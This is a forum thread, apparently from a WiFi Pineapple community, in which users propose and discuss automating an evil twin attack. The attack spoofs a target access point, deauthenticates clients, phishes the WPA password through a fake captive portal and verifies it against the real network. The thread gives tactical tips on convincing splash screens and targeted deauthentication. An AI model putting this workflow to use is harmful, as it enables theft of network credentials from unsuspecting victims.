Jump to content

<IDEA> Infusion Idea


cheeto

Recommended Posts

Hey guys, here's my infusion idea.


It's based on "linset".


The objective is to get any Wifi password. (WPA/2 etc..)


Today, this can be done with Evil portal. It works as long as the splash screen is convincing.

But why not go further?:


First step is select target AP and spoof the bssid name.

2nd, death the Target's AP.

Once the client connects to the MKV (Evil Portal) and enters the wifi password, the MKV will TEST the password on the victim's AP.

If the password is correct, then the password is saved and both Evil Portal and Deauth are shut off. If the Wifi entered

by the client is incorrect, they'll be prompted to re-enter the correct password.


This works great on LINSET, it would be ground breaking if the MKV could do this too.


Cheers and thanks 4 reading.


Link to comment
Share on other sites

apart from a new infusion, This should also be easy enough to implement with a portalauth injection set with some script to run on the "connect" button press to check the validity of the apart credentials provided, and evilportal.

I do like the idea though :)

Edited by DataHead
Link to comment
Share on other sites

apart from a new infusion, This should also be easy enough to implement with a portalauth injection set with some script to run on the "connect" button press to check the validity of the apart credentials provided, and evilportal.

This is a really good idea for an injection set. I'll have to look into it after I complete the updates I'm already working on for Portal Auth and the Payloader injection set. Unless if someone else wants to work on it. After all, the modularity of injection sets was intentionally designed so others could create and share.

Edited by sud0nick
Link to comment
Share on other sites

In theory, this would very much so work as an injection set of portal auth. As we can launch scripts with the injection set. The only thing that differs in the video, is it captures a handshake or half handshake of the client and target AP. And checks the captured password credential in aircrack with said handshake. Which would also be possible with the pineapple, and through the injection set script. This could also be made as a standalone infusion, but seeing that all things are in place and already made for this to be possible ( aside from said injection set and script ), I personally do not think a seperate infusion needs to be made. Love the idea though. If I get enough free time I can look into this also

Link to comment
Share on other sites

I think the MKV version of this could actually be better. For one reason, Linset does not allow you to customize the splash screen. We all know we can make our own splash screen on the mkv.

I agree the MKV has a lot of the tools needed to get this to work. The biggest challenge will be making the script that will collect the wifi password and test it on the victim´s AP.

If the password is correct then, shut down the deaith & bssid spoof, if the password id incorrect then continue deauthing and spoofing the victim´s AP.

I know nothing about programming, but I'm more than willing to test whatever you guys need testing.

cheers!!

Link to comment
Share on other sites

First step is select target AP and spoof the bssid name.
2nd, death the Target's AP.
Once the client connects to the MKV (Evil Portal) and enters the wifi password, the MKV will TEST the password on the victim's AP.

Not to rain on your parade, but you are missing some key steps between 2 and the rest of it.

The victim will notice that they are being repeatedly disconnected from their wifi and if they are competent enough to check the list of available networks they will notice there are 2 networks with their home ssid name and one of them is listed as being an open network. If they connect, you are counting on them not to be intimidated by a router screen and you assume they know their wpa password.

This technique requires the victim has the right mix of competence and incompetence, and it has a high degree of detection.

Link to comment
Share on other sites

The average user doesn't know the difference between wep or wap.

Anyway, I have tested this theory many times and it works 88% of the time.

It all boils down to the splash screen. It has to look very real. Before pentesting a target, It's important to check out the router brand or even the isp. All of this is possible and will come in handy when making a convincing splash screen.

Another important measure is to zero in on the victims channel. This way when you deauth the target you will only death a specific bssid. (No channel scanning) this sometimes makes the target bssid disappear, so the only option is to log onto the mkv.

My suggestion is simply to automize this rather than having to check to see if you picked up a credential. The mkv has the capability to do this, but it needs to be stringed together into 1 infusion and automized.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...